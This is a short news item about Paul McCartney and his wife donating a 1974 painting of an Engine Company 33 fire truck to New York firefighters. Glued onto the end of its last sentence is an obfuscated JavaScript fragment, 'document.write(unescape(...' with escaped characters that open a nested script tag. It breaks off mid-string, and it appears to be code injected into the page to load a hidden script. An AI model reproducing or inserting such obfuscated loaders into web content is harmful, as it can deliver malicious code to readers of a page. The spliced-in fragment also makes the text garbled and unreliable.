Paul McCartney and his wife have donated a painting to New York firefighters. The 1974 painting by Ron Kleinman shows a Mack truck once operated by the members of Engine Company number 33 in Manhattan.
McCartney says in a statement he gives it "with deep respect and gratitude" to the firefighters union with "a heartfelt thanks." McCartney's father was a firefighter. The painting will be displayed at firehouses throughout the city.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
